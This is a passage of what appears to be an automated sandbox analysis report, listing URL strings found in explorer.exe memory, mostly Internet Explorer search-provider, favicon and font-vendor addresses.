            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000024.00000002.674152655.0000000002280000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: msapplication.xml.19.drString found in binary or memory: http://www.amazon.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000024.00000000.659633766.0000000007CC8000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: msapplication.xml2.19.drString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: msapplication.xml3.19.drString found in binary or memory: http://www.live.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
